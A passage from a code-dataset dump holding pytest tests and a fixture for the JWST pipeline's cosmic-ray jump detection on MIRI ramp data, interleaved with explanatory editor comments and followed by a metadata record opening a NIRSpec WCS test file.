model1.data[0, 2, 5, 5] = 25.0\n model1.data[0, 3, 5, 5] = 30.0\n model1.data[0, 4, 5, 5] = 35.0\n model1.data[0, 5, 5, 5] = 140.0\n model1.data[0, 6, 5, 5] = 150.0\n model1.data[0, 7, 5, 5] = 160.0\n model1.data[0, 8, 5, 5] = 170.0\n model1.data[0, 9, 5, 5] = 180.0\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 1, 200, 4, True)\n assert (4 == np.max(out_model.groupdq[0, 5, 5, 5]))\n assert (4 == out_model.groupdq[0, 5, 5, 6])\n assert (4 == out_model.groupdq[0, 5, 5, 4])\n assert (4 == out_model.groupdq[0, 5, 6, 5])\n assert (4 == out_model.groupdq[0, 5, 4, 5])\n\ndef test_nocr_100_groups_nframes1(setup_inputs):\n \"\"\"\"\n NO CR in a 100 group exposure to make sure that frames_per_group is passed correctly to\n twopoint_difference. This test recreates the problem found in issue #4571.\n \"\"\"\n grouptime = 3.0\n ingain = 1 #to make the noise calculation simple\n inreadnoise = np.float64(7)\n ngroups = 100\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=ngroups, nrows=100, ncols=100,\n gain=ingain, readnoise=inreadnoise,\n deltatime=grouptime)\n model1.meta.exposure.nframes = 1\n # two segments perfect fit, second segment has twice the slope\n model1.data[0, 0, 5, 5] = 14.0\n model1.data[0, 1, 5, 5] = 20.0\n model1.data[0, 2, 5, 5] = 27.0\n model1.data[0, 3, 5, 5] = 30.0\n model1.data[0, 4, 5, 5] = 38.0\n model1.data[0, 5, 5, 5] = 40.0\n model1.data[0, 6, 5, 5] = 50.0\n model1.data[0, 7, 5, 5] = 52.0\n model1.data[0, 8, 5, 5] = 63.0\n model1.data[0, 9, 5, 5] = 68.0\n for i in range(10,100):\n model1.data[0,i,5,5] = i * 5\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 1, 200, 4, True)\n assert (0 == np.max(out_model.groupdq))\n\ndef test_twoints_onecr_each_10_groups_neighbors_flagged(setup_inputs):\n \"\"\"\"\n Two integrations with CRs in different locations. 
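# --- Editor's note: hedged demo. ---
# The hand-written ramps above are two perfect linear segments: 5 DN/group
# up to group 4, then 10 DN/group from group 5, where the value lands
# 100 DN above the extrapolated first segment (140 observed vs 40
# predicted): the discontinuity the jump step must flag. Vectorized:
import numpy as np

groups = np.arange(10)
ramp = np.where(groups < 5,
                15.0 + 5.0 * groups,            # 15, 20, 25, 30, 35
                140.0 + 10.0 * (groups - 5))    # 140, 150, ..., 180
assert ramp[5] - ramp[4] == 105.0               # 5 expected, 105 seen
assert np.all(np.diff(ramp[5:]) == 10.0)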
This makes sure we are correctly\n dealing with integrations.\n \"\"\"\n grouptime = 3.0\n ingain = 200\n inreadnoise = np.float64(7)\n ngroups = 10\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=ngroups, nints=2,\n gain=ingain, readnoise=inreadnoise, deltatime=grouptime)\n # two segments perfect fit, second segment has twice the slope\n model1.data[0, 0, 5, 5] = 15.0\n model1.data[0, 1, 5, 5] = 20.0\n model1.data[0, 2, 5, 5] = 25.0\n model1.data[0, 3, 5, 5] = 30.0\n model1.data[0, 4, 5, 5] = 35.0\n model1.data[0, 5, 5, 5] = 140.0\n model1.data[0, 6, 5, 5] = 150.0\n model1.data[0, 7, 5, 5] = 160.0\n model1.data[0, 8, 5, 5] = 170.0\n model1.data[0, 9, 5, 5] = 180.0\n model1.data[1, 0, 15, 5] = 15.0\n model1.data[1, 1, 15, 5] = 20.0\n model1.data[1, 2, 15, 5] = 25.0\n model1.data[1, 3, 15, 5] = 30.0\n model1.data[1, 4, 15, 5] = 35.0\n model1.data[1, 5, 15, 5] = 40.0\n model1.data[1, 6, 15, 5] = 45.0\n model1.data[1, 7, 15, 5] = 160.0\n model1.data[1, 8, 15, 5] = 170.0\n model1.data[1, 9, 15, 5] = 180.0\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 1, 200, 4, True)\n assert (4 == np.max(out_model.groupdq[0, 5, 5, 5]))\n assert (4 == out_model.groupdq[0, 5, 5, 6])\n assert (4 == out_model.groupdq[0, 5, 5, 4])\n assert (4 == out_model.groupdq[0, 5, 6, 5])\n assert (4 == out_model.groupdq[0, 5, 4, 5])\n assert (4 == out_model.groupdq[1, 7, 15, 5])\n assert (4 == out_model.groupdq[1, 7, 15, 6])\n assert (4 == out_model.groupdq[1, 7, 15, 4])\n assert (4 == out_model.groupdq[1, 7, 16, 5])\n assert (4 == out_model.groupdq[1, 7, 14, 5])\n\ndef test_flagging_of_CRs_across_slice_boundaries(setup_inputs):\n \"\"\"\"\n A multiprocessing test that has two CRs on the boundary between two slices.\n This makes sure that we are correctly flagging neighbors in different slices.\n \"\"\"\n grouptime = 3.0\n ingain = 200\n inreadnoise = np.float64(7)\n ngroups = 10\n\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=ngroups, nints=2,\n gain=ingain, readnoise=inreadnoise,\n deltatime=grouptime)\n nrows = model1.data.shape[3]\n num_cores = multiprocessing.cpu_count()\n max_cores = 'half'\n numslices = num_cores // 2\n if numslices > 1:\n yincrement = int(nrows / numslices)\n # two segments perfect fit, second segment has twice the slope\n #add a CR on the last row of the first slice\n model1.data[0, 0, yincrement-1, 5] = 15.0\n model1.data[0, 1, yincrement-1, 5] = 20.0\n model1.data[0, 2, yincrement-1, 5] = 25.0\n model1.data[0, 3, yincrement-1, 5] = 30.0\n model1.data[0, 4, yincrement-1, 5] = 35.0\n model1.data[0, 5, yincrement-1, 5] = 140.0\n model1.data[0, 6, yincrement-1, 5] = 150.0\n model1.data[0, 7, yincrement-1, 5] = 160.0\n model1.data[0, 8, yincrement-1, 5] = 170.0\n model1.data[0, 9, yincrement-1, 5] = 180.0\n #add a CR on the first row of the second slice\n model1.data[1, 0, yincrement, 25] = 15.0\n model1.data[1, 1, yincrement, 25] = 20.0\n model1.data[1, 2, yincrement, 25] = 25.0\n model1.data[1, 3, yincrement, 25] = 30.0\n model1.data[1, 4, yincrement, 25] = 35.0\n model1.data[1, 5, yincrement, 25] = 40.0\n model1.data[1, 6, yincrement, 25] = 50.0\n model1.data[1, 7, yincrement, 25] = 160.0\n model1.data[1, 8, yincrement, 25] = 170.0\n model1.data[1, 9, yincrement, 25] = 180.0\n out_model = detect_jumps(model1, gain, rnModel, 4.0, max_cores, 200, 4, True)\n #check that the neighbors of the CR on the last row were flagged\n assert (4 == out_model.groupdq[0, 5, yincrement-1, 5])\n assert (4 == out_model.groupdq[0, 5, yincrement-1, 6])\n assert (4 == 
out_model.groupdq[0, 5, yincrement-1, 4])\n assert (4 == out_model.groupdq[0, 5, yincrement, 5])\n assert (4 == out_model.groupdq[0, 5, yincrement-2, 5])\n # check that the neighbors of the CR on the first row were flagged\n assert (4 == out_model.groupdq[1, 7, yincrement, 25])\n assert (4 == out_model.groupdq[1, 7, yincrement, 26])\n assert (4 == out_model.groupdq[1, 7, yincrement, 24])\n assert (4 == out_model.groupdq[1, 7, yincrement+1, 25])\n assert (4 == out_model.groupdq[1, 7, yincrement-1, 25])\n\n\ndef test_twoints_onecr_10_groups_neighbors_flagged_multi(setup_inputs):\n \"\"\"\"\n A multiprocessing test that has two CRs on the boundary between two slices\n in different integrations. This makes sure that we are correctly flagging\n neighbors in different slices and that we are parsing the integrations correctly.\n \"\"\"\n grouptime = 3.0\n ingain = 200\n inreadnoise = np.float64(7)\n ngroups = 10\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=ngroups, nints=2,\n gain=ingain, readnoise=inreadnoise, deltatime=grouptime)\n # two segments perfect fit, second segment has twice the slope\n model1.data[0, 0, 5, 5] = 15.0\n model1.data[0, 1, 5, 5] = 20.0\n model1.data[0, 2, 5, 5] = 25.0\n model1.data[0, 3, 5, 5] = 30.0\n model1.data[0, 4, 5, 5] = 35.0\n model1.data[0, 5, 5, 5] = 140.0\n model1.data[0, 6, 5, 5] = 150.0\n model1.data[0, 7, 5, 5] = 160.0\n model1.data[0, 8, 5, 5] = 170.0\n model1.data[0, 9, 5, 5] = 180.0\n model1.data[1, 0, 15, 5] = 15.0\n model1.data[1, 1, 15, 5] = 20.0\n model1.data[1, 2, 15, 5] = 25.0\n model1.data[1, 3, 15, 5] = 30.0\n model1.data[1, 4, 15, 5] = 35.0\n model1.data[1, 5, 15, 5] = 40.0\n model1.data[1, 6, 15, 5] = 45.0\n model1.data[1, 7, 15, 5] = 160.0\n model1.data[1, 8, 15, 5] = 170.0\n model1.data[1, 9, 15, 5] = 180.0\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 'half', 200, 4, True)\n assert (4 == np.max(out_model.groupdq[0, 5, 5, 5]))\n assert (4 == out_model.groupdq[0, 5, 5, 6])\n assert (4 == out_model.groupdq[0, 5, 5, 4])\n assert (4 == out_model.groupdq[0, 5, 6, 5])\n assert (4 == out_model.groupdq[0, 5, 4, 5])\n assert (4 == out_model.groupdq[1, 7, 15, 5])\n assert (4 == out_model.groupdq[1, 7, 15, 6])\n assert (4 == out_model.groupdq[1, 7, 15, 4])\n assert (4 == out_model.groupdq[1, 7, 16, 5])\n assert (4 == out_model.groupdq[1, 7, 14, 5])\n\[email protected](reason=\"Test is only used to test performance issue. No need to run every time.\")\ndef test_every_pixel_CR_neighbors_flagged(setup_inputs):\n \"\"\"\"\n A multiprocessing test that has a jump in every pixel. 
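# --- Editor's note: hedged demo. ---
# The slice-boundary test above puts one CR on the last row of slice 0
# and one on the first row of slice 1, so neighbor flagging must reach
# across rows handed to different worker processes. The row partitioning
# it assumes (max_cores='half' on, say, an 8-core host):
nrows, numslices = 1024, 4
yincrement = nrows // numslices           # rows per worker slice
starts = [i * yincrement for i in range(numslices)]
assert starts == [0, 256, 512, 768]
# rows yincrement-1 and yincrement straddle the first slice boundary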
This is used\n to test the performance gain from multiprocessing.\n \"\"\"\n grouptime = 3.0\n ingain = 200\n inreadnoise = np.float64(7)\n ngroups = 10\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=ngroups,\n gain=ingain, readnoise=inreadnoise, deltatime=grouptime)\n # two segments perfect fit, second segment has twice the slope\n model1.data[0, 0, :, :] = 15.0\n model1.data[0, 1, :, :] = 20.0\n model1.data[0, 2, :, :] = 25.0\n model1.data[0, 3, :, :] = 30.0\n model1.data[0, 4, :, :] = 35.0\n model1.data[0, 5, :, :] = 140.0\n model1.data[0, 6, :, :] = 150.0\n model1.data[0, 7, :, :] = 160.0\n model1.data[0, 8, :, :] = 170.0\n model1.data[0, 9, :, :] = 180.0\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 'half', 200, 4, True)\n assert (4 == np.max(out_model.groupdq[0, 5, 5, 5]))\n assert (4 == out_model.groupdq[0, 5, 5, 6])\n assert (4 == out_model.groupdq[0, 5, 5, 4])\n assert (4 == out_model.groupdq[0, 5, 6, 5])\n assert (4 == out_model.groupdq[0, 5, 4, 5])\n\ndef test_crs_on_edge_with_neighbor_flagging(setup_inputs):\n \"\"\"\"\n A test to make sure that the neighbors of CRs on the edges of the\n array are flagged correctly.\n \"\"\"\n grouptime = 3.0\n ingain = 200\n inreadnoise = np.float64(7)\n ngroups = 10\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=ngroups,\n gain=ingain, readnoise=inreadnoise,\n deltatime=grouptime)\n # two segments perfect fit, second segment has twice the slope\n # CR on 1st row\n model1.data[0, 0, 0, 15] = 15.0\n model1.data[0, 1, 0, 15] = 20.0\n model1.data[0, 2, 0, 15] = 25.0\n model1.data[0, 3, 0, 15] = 30.0\n model1.data[0, 4, 0, 15] = 35.0\n model1.data[0, 5, 0, 15] = 140.0\n model1.data[0, 6, 0, 15] = 150.0\n model1.data[0, 7, 0, 15] = 160.0\n model1.data[0, 8, 0, 15] = 170.0\n model1.data[0, 9, 0, 15] = 180.0\n # CR on last row\n model1.data[0, 0, 1023, 5] = 15.0\n model1.data[0, 1, 1023, 5] = 20.0\n model1.data[0, 2, 1023, 5] = 25.0\n model1.data[0, 3, 1023, 5] = 30.0\n model1.data[0, 4, 1023, 5] = 35.0\n model1.data[0, 5, 1023, 5] = 140.0\n model1.data[0, 6, 1023, 5] = 150.0\n model1.data[0, 7, 1023, 5] = 160.0\n model1.data[0, 8, 1023, 5] = 170.0\n model1.data[0, 9, 1023, 5] = 180.0\n # CR on 1st column\n model1.data[0, 0, 5, 0] = 15.0\n model1.data[0, 1, 5, 0] = 20.0\n model1.data[0, 2, 5, 0] = 25.0\n model1.data[0, 3, 5, 0] = 30.0\n model1.data[0, 4, 5, 0] = 35.0\n model1.data[0, 5, 5, 0] = 140.0\n model1.data[0, 6, 5, 0] = 150.0\n model1.data[0, 7, 5, 0] = 160.0\n model1.data[0, 8, 5, 0] = 170.0\n model1.data[0, 9, 5, 0] = 180.0\n # CR on last column\n model1.data[0, 0, 15, 1027] = 15.0\n model1.data[0, 1, 15, 1027] = 20.0\n model1.data[0, 2, 15, 1027] = 25.0\n model1.data[0, 3, 15, 1027] = 30.0\n model1.data[0, 4, 15, 1027] = 35.0\n model1.data[0, 5, 15, 1027] = 140.0\n model1.data[0, 6, 15, 1027] = 150.0\n model1.data[0, 7, 15, 1027] = 160.0\n model1.data[0, 8, 15, 1027] = 170.0\n model1.data[0, 9, 15, 1027] = 180.0\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 1, 200, 10, True)\n # flag CR and three neighbors of first row CR\n assert (4 == out_model.groupdq[0, 5, 0, 15])\n assert (4 == out_model.groupdq[0, 5, 1, 15])\n assert (4 == out_model.groupdq[0, 5, 0, 14])\n assert (4 == out_model.groupdq[0, 5, 0, 16])\n assert (out_model.groupdq[0, 5, -1, 15] == 0) # The one not to flag\n # flag CR and three neighbors of last row CR\n assert (4 == out_model.groupdq[0, 5, 1023, 5])\n assert (4 == out_model.groupdq[0, 5, 1022, 5])\n assert (4 == out_model.groupdq[0, 5, 1023, 4])\n assert (4 == 
out_model.groupdq[0, 5, 1023, 6])\n # flag CR and three neighbors of first column CR\n assert (4 == out_model.groupdq[0, 5, 5, 0])\n assert (4 == out_model.groupdq[0, 5, 6, 0])\n assert (4 == out_model.groupdq[0, 5, 4, 0])\n assert (4 == out_model.groupdq[0, 5, 5, 1])\n assert (out_model.groupdq[0, 5, 5, -1] == 0)# The one not to flag\n # flag CR and three neighbors of last column CR\n assert (4 == out_model.groupdq[0, 5, 15, 1027])\n assert (4 == out_model.groupdq[0, 5, 15, 1026])\n assert (4 == out_model.groupdq[0, 5, 16, 1027])\n assert (4 == out_model.groupdq[0, 5, 14, 1027])\n\n\ndef test_onecr_10_groups(setup_inputs):\n \"\"\"\"\n A test to make sure that neighbors are not flagged when they are not requested to be flagged.\n \"\"\"\n grouptime = 3.0\n ingain = 200\n inreadnoise = np.float64(7)\n ngroups = 10\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=ngroups,\n gain=ingain, readnoise=inreadnoise, deltatime=grouptime)\n # two segments perfect fit, second segment has twice the slope\n model1.data[0, 0, 5, 5] = 15.0\n model1.data[0, 1, 5, 5] = 20.0\n model1.data[0, 2, 5, 5] = 25.0\n model1.data[0, 3, 5, 5] = 30.0\n model1.data[0, 4, 5, 5] = 35.0\n model1.data[0, 5, 5, 5] = 140.0\n model1.data[0, 6, 5, 5] = 150.0\n model1.data[0, 7, 5, 5] = 160.0\n model1.data[0, 8, 5, 5] = 170.0\n model1.data[0, 9, 5, 5] = 180.0\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 1, 200, 10, False)\n assert (out_model.groupdq[0, 5, 5, 5] == 4)\n assert (out_model.groupdq[0, 5, 4, 5] == 0)\n assert (out_model.groupdq[0, 5, 6, 5] == 0)\n assert (out_model.groupdq[0, 5, 5, 6] == 0)\n assert (out_model.groupdq[0, 5, 5, 4] == 0)\n\ndef test_onecr_10_groups_fullarray(setup_inputs):\n \"\"\"\"\n A test that has a cosmic ray in the 5th group for all pixels except column 10. In column\n 10 the jump is in the 7th group.\n \"\"\"\n grouptime = 3.0\n ingain = 5\n inreadnoise = np.float64(7)\n ngroups = 10\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=ngroups,\n gain=ingain, readnoise=inreadnoise, deltatime=grouptime)\n #\n model1.data[0, 0, 5, :] = 15.0\n model1.data[0, 1, 5, :] = 20.0\n model1.data[0, 2, 5, :] = 25.0\n model1.data[0, 3, 5, :] = 30.0\n model1.data[0, 4, 5, :] = 35.0\n model1.data[0, 5, 5, :] = 140.0\n model1.data[0, 6, 5, :] = 150.0\n model1.data[0, 7, 5, :] = 160.0\n model1.data[0, 8, 5, :] = 170.0\n model1.data[0, 9, 5, :] = 180.0\n # move the CR to group 7 for row 10 and make difference be 300\n model1.data[0, 3, 5, 10] = 100\n model1.data[0, 4, 5, 10] = 130\n model1.data[0, 5, 5, 10] = 160\n model1.data[0, 6, 5, 10] = 190\n model1.data[0, 7, 5, 10] = 400\n model1.data[0, 8, 5, 10] = 410\n model1.data[0, 9, 5, 10] = 420\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 1, 200, 10, False)\n assert (np.all(out_model.groupdq[0, 5, 5, 0:10] == 4)) # The jump is in group 5 for columns 0-9\n assert (out_model.groupdq[0, 7, 5, 10] == 4) # The jump is in group 7 for column 10\n assert (np.all(out_model.groupdq[0, 5, 5, 11:] == 4)) # The jump is in group 5 for columns 11+\n\n\ndef test_onecr_50_groups(setup_inputs):\n \"\"\"\"\n A test with a fifty group integration. There are two jumps in pixel 5,5. 
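# --- Editor's note: hedged demo. ---
# The bare 4 asserted throughout these tests is the JUMP_DET bit of the
# JWST group DQ bit mask (DO_NOT_USE=1, SATURATED=2, JUMP_DET=4), so a
# robust membership check is bitwise rather than an equality test:
from jwst.datamodels import dqflags

assert dqflags.group['JUMP_DET'] == 4
combined = dqflags.group['JUMP_DET'] | dqflags.group['SATURATED']
assert combined & dqflags.group['JUMP_DET']    # jump bit still set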
One in group 5 and\n one in group 30.\n \"\"\"\n grouptime = 3.0\n ingain = 5\n inreadnoise = np.float64(7)\n ngroups = 50\n model1, gdq, rnModel, pixdq, err, gain = setup_inputs(ngroups=ngroups,\n gain=ingain, readnoise=inreadnoise, deltatime=grouptime)\n\n model1.data[0, 0, 5, 5] = 15.0\n model1.data[0, 1, 5, 5] = 20.0\n model1.data[0, 2, 5, 5] = 25.0\n model1.data[0, 3, 5, 5] = 30.0\n model1.data[0, 4, 5, 5] = 35.0\n model1.data[0, 5, 5, 5] = 140.0\n model1.data[0, 6, 5, 5] = 150.0\n model1.data[0, 7, 5, 5] = 160.0\n model1.data[0, 8, 5, 5] = 170.0\n model1.data[0, 9, 5, 5] = 180.0\n model1.data[0, 10:30, 5, 5] = np.arange(190, 290, 5)\n model1.data[0, 30:50, 5, 5] = np.arange(500, 600, 5)\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 1, 200, 10, False)\n assert (out_model.groupdq[0, 5, 5, 5] == 4) # CR in group 5\n assert (out_model.groupdq[0, 30, 5, 5] == 4) # CR in group 30\n assert (np.all(out_model.groupdq[0, 6:30, 5, 5] == 0)) # groups in between are not flagged\n\n\ndef test_single_CR_neighbor_flag( setup_inputs):\n \"\"\"\"\n A single CR in a 10 group exposure. Tests that:\n - if neighbor-flagging is set, the 4 neighboring pixels *ARE* flagged, and\n - if neighbor-flagging is *NOT* set, the 4 neighboring pixels are *NOT* flagged\n \"\"\"\n grouptime = 3.0\n ingain = 5\n inreadnoise = np.float64(7)\n ngroups = 10\n\n model1, gdq, rnModel, pixdq, err, gain = \\\n setup_inputs( ngroups=ngroups, nrows=5, ncols=6, gain=ingain, readnoise=inreadnoise,\n deltatime=grouptime )\n\n # two segments perfect fit, second segment has twice the slope\n model1.data[0, 0, 3, 3] = 15.0\n model1.data[0, 1, 3, 3] = 20.0\n model1.data[0, 2, 3, 3] = 25.0\n model1.data[0, 3, 3, 3] = 30.0\n model1.data[0, 4, 3, 3] = 35.0\n model1.data[0, 5, 3, 3] = 140.0\n model1.data[0, 6, 3, 3] = 150.0\n model1.data[0, 7, 3, 3] = 160.0\n model1.data[0, 8, 3, 3] = 170.0\n model1.data[0, 9, 3, 3] = 180.0\n\n # Flag neighbors\n out_model = detect_jumps( model1, gain, rnModel, 4.0, 1, 200, 4, True )\n\n assert (4 == np.max(out_model.groupdq[0, 5, 3, 3]))\n assert (4 == out_model.groupdq[0, 5, 3, 4])\n assert (4 == out_model.groupdq[0, 5, 3, 2])\n assert (4 == out_model.groupdq[0, 5, 2, 3])\n assert (4 == out_model.groupdq[0, 5, 4, 3])\n\n # Do not flag neighbors\n out_model = detect_jumps( model1, gain, rnModel, 4.0, 1, 200, 4, False )\n\n assert (4 == np.max(out_model.groupdq[0, 5, 3, 3]))\n assert (0 == out_model.groupdq[0, 5, 3, 4])\n assert (0 == out_model.groupdq[0, 5, 3, 2])\n assert (0 == out_model.groupdq[0, 5, 2, 3])\n assert (0 == out_model.groupdq[0, 5, 4, 3])\n\n\ndef test_proc(setup_inputs):\n \"\"\"\"\n A single CR in a 10 group exposure. 
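# --- Editor's note: hedged demo. ---
# test_onecr_50_groups above fills groups 10-29 and 30-49 with np.arange
# slices; both segments climb 5 DN/group, so the only anomaly is the
# 215 DN step from 285 to 500 at group 30 (210 DN above the expected 5):
import numpy as np

seg1 = np.arange(190, 290, 5)       # groups 10..29 -> 190, 195, ..., 285
seg2 = np.arange(500, 600, 5)       # groups 30..49 -> 500, 505, ..., 595
assert len(seg1) == len(seg2) == 20
assert seg2[0] - seg1[-1] == 215    # the second jump the test asserts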
Verify that the pixels flagged using\n multiprocessing are identical to the pixels flagged when no\n multiprocessing is done.\n \"\"\"\n grouptime = 3.0\n ingain = 5\n inreadnoise = np.float64(7)\n ngroups = 10\n\n model1, gdq, rnModel, pixdq, err, gain = \\\n setup_inputs( ngroups=ngroups, nrows=5, ncols=6, nints=2, gain=ingain, readnoise=inreadnoise,\n deltatime=grouptime )\n\n model1.data[0, 0, 2, 3] = 15.0\n model1.data[0, 1, 2, 3] = 21.0\n model1.data[0, 2, 2, 3] = 25.0\n model1.data[0, 3, 2, 3] = 30.2\n model1.data[0, 4, 2, 3] = 35.0\n model1.data[0, 5, 2, 3] = 140.0\n model1.data[0, 6, 2, 3] = 151.0\n model1.data[0, 7, 2, 3] = 160.0\n model1.data[0, 8, 2, 3] = 170.0\n model1.data[0, 9, 2, 3] = 180.0\n\n out_model_a = detect_jumps( model1, gain, rnModel, 4.0, 'half', 200, 4, True )\n out_model_b = detect_jumps( model1, gain, rnModel, 4.0, None, 200, 4, True )\n assert( out_model_a.groupdq == out_model_b.groupdq ).all()\n\n out_model_c = detect_jumps( model1, gain, rnModel, 4.0, 'All', 200, 4, True )\n assert( out_model_a.groupdq == out_model_c.groupdq ).all()\n\n\ndef test_adjacent_CRs( setup_inputs ):\n \"\"\"\n Three CRs in a 10 group exposure; the CRs have overlapping neighboring\n pixels. This test makes sure that the correct pixels are flagged.\n \"\"\"\n grouptime = 3.0\n ingain = 5\n inreadnoise = np.float64(7)\n ngroups = 10\n model1, gdq, rnModel, pixdq, err, gain = \\\n setup_inputs( ngroups=ngroups, nrows=5, ncols=6, gain=ingain,\n readnoise=inreadnoise, deltatime=grouptime )\n\n # Populate arrays for 1st CR, centered at (x=2, y=3)\n x=2; y=3\n model1.data[0, 0, y, x] = 15.0\n model1.data[0, 1, y, x] = 20.0\n model1.data[0, 2, y, x] = 26.0\n model1.data[0, 3, y, x] = 30.0\n model1.data[0, 4, y, x] = 35.0\n model1.data[0, 5, y, x] = 140.0\n model1.data[0, 6, y, x] = 150.0\n model1.data[0, 7, y, x] = 161.0\n model1.data[0, 8, y, x] = 170.0\n model1.data[0, 9, y, x] = 180.0\n\n # Populate arrays for 2nd CR, centered at (x=2, y=2)\n x=2; y=2\n model1.data[0, 0, y, x] = 20.0\n model1.data[0, 1, y, x] = 30.0\n model1.data[0, 2, y, x] = 41.0\n model1.data[0, 3, y, x] = 51.0\n model1.data[0, 4, y, x] = 62.0\n model1.data[0, 5, y, x] = 170.0\n model1.data[0, 6, y, x] = 200.0\n model1.data[0, 7, y, x] = 231.0\n model1.data[0, 8, y, x] = 260.0\n model1.data[0, 9, y, x] = 290.0\n\n # Populate arrays for 3rd CR, centered at (x=3, y=2)\n x=3; y=2\n model1.data[0, 0, y, x] = 120.0\n model1.data[0, 1, y, x] = 140.0\n model1.data[0, 2, y, x] = 161.0\n model1.data[0, 3, y, x] = 181.0\n model1.data[0, 4, y, x] = 202.0\n model1.data[0, 5, y, x] = 70.0\n model1.data[0, 6, y, x] = 100.0\n model1.data[0, 7, y, x] = 131.0\n model1.data[0, 8, y, x] = 160.0\n model1.data[0, 9, y, x] = 190.0\n\n out_model = detect_jumps(model1, gain, rnModel, 4.0, 'half', 200, 4, True)\n\n # 1st CR (centered at x=2, y=3)\n assert (4 == out_model.groupdq[ 0,5,2,2 ])\n assert (4 == out_model.groupdq[ 0,5,3,1 ])\n assert (4 == out_model.groupdq[ 0,5,3,2 ])\n assert (4 == out_model.groupdq[ 0,5,3,3 ])\n assert (4 == out_model.groupdq[ 0,5,4,2 ])\n\n # 2nd CR (centered at x=2, y=2)\n assert (4 == out_model.groupdq[ 0,5,1,2 ])\n assert (4 == out_model.groupdq[ 0,5,2,1 ])\n assert (4 == out_model.groupdq[ 0,5,2,3 ])\n\n # 3rd CR (centered at x=3, y=2)\n assert (4 == out_model.groupdq[ 0,5,1,3 ])\n assert (4 == out_model.groupdq[ 0,5,2,4 ])\n\n# Need test for multi-ints near zero with positive and negative slopes\n\[email protected]\ndef setup_inputs():\n def _setup(ngroups=10, readnoise=10, nints=1,\n nrows=1024, 
ncols=1032, nframes=1, grouptime=1.0, gain=1, deltatime=1,\n gain_subarray = False, readnoise_subarray = False, subarray = False):\n times = np.array(list(range(ngroups)), dtype=np.float64) * deltatime\n gain = np.ones(shape=(nrows, ncols), dtype=np.float64) * gain\n\n\n pixdq = np.zeros(shape=(nrows, ncols), dtype=np.float64)\n read_noise = np.full((nrows, ncols), readnoise, dtype=np.float64)\n gdq = np.zeros(shape=(nints, ngroups, nrows, ncols), dtype=np.uint32)\n if subarray:\n data = np.zeros(shape=(nints, ngroups, 20, 20), dtype=np.float64)\n err = np.ones(shape=(nints, ngroups, 20, 20), dtype=np.float64)\n else:\n data = np.zeros(shape=(nints, ngroups, nrows, ncols), dtype=np.float64)\n err = np.ones(shape=(nints, ngroups, nrows, ncols), dtype=np.float64)\n model1 = RampModel(data=data, err=err, pixeldq=pixdq, groupdq=gdq, times=times)\n model1.meta.instrument.name = 'MIRI'\n model1.meta.instrument.detector = 'MIRIMAGE'\n model1.meta.instrument.filter = 'F480M'\n model1.meta.observation.date = '2015-10-13'\n model1.meta.exposure.type = 'MIR_IMAGE'\n model1.meta.exposure.group_time = deltatime\n model1.meta.subarray.name = 'FULL'\n model1.meta.subarray.xstart = 1\n model1.meta.subarray.ystart = 1\n if subarray:\n model1.meta.subarray.xsize = 20\n model1.meta.subarray.ysize = 20\n else:\n model1.meta.subarray.xsize = ncols\n model1.meta.subarray.ysize = nrows\n model1.meta.exposure.frame_time = deltatime\n model1.meta.exposure.ngroups = ngroups\n model1.meta.exposure.group_time = deltatime\n model1.meta.exposure.nframes = 1\n model1.meta.exposure.groupgap = 0\n gain = GainModel(data=gain)\n gain.meta.instrument.name = 'MIRI'\n gain.meta.subarray.xstart = 1\n gain.meta.subarray.ystart = 1\n gain.meta.subarray.xsize = ncols\n gain.meta.subarray.ysize = nrows\n rnModel = ReadnoiseModel(data=read_noise)\n rnModel.meta.instrument.name = 'MIRI'\n rnModel.meta.subarray.xstart = 1\n rnModel.meta.subarray.ystart = 1\n rnModel.meta.subarray.xsize = ncols\n rnModel.meta.subarray.ysize = nrows\n return model1, gdq, rnModel, pixdq, err, gain\n\n return _setup\n" }, { "alpha_fraction": 0.5438500642776489, "alphanum_fraction": 0.6121904253959656, "avg_line_length": 31.48444366455078, "blob_id": "c90591b5595aefa142ef97274106117b3ea56bbc", "content_id": "3850fcd078365729695ffb7d7d17b9ca965b69b7", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14618, "license_type": "permissive", "max_line_length": 101, "num_lines": 450, "path": "/jwst/assign_wcs/tests/test_nirspec.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"\nTest functions for NIRSPEC WCS - all modes.\n\"\"\"\nimport os.path\n\nimport pytest\nimport numpy as np\nfrom numpy.testing import assert_allclose\nfrom astropy.io import fits\nfrom astropy.modeling import models as astmodels\nfrom astropy import wcs as astwcs\nimport astropy.units as u\nimport astropy.coordinates as coords\nfrom gwcs import wcs\n\nfrom jwst import datamodels\nfrom jwst.transforms.models import Slit\nfrom jwst.assign_wcs import nirspec\nfrom jwst.assign_wcs import assign_wcs_step\nfrom . 
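# --- Editor's note: hedged sketch. ---
# setup_inputs above is pytest's "factory fixture" pattern: the fixture
# returns an inner function so every test can request its own ramp
# geometry instead of sharing one canned dataset. In miniature:
import numpy as np
import pytest

@pytest.fixture
def make_ramp():
    def _make(nints=1, ngroups=10, nrows=4, ncols=4):
        return np.zeros((nints, ngroups, nrows, ncols), dtype=np.float64)
    return _make

def test_uses_factory(make_ramp):
    assert make_ramp(ngroups=5).shape == (1, 5, 4, 4)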
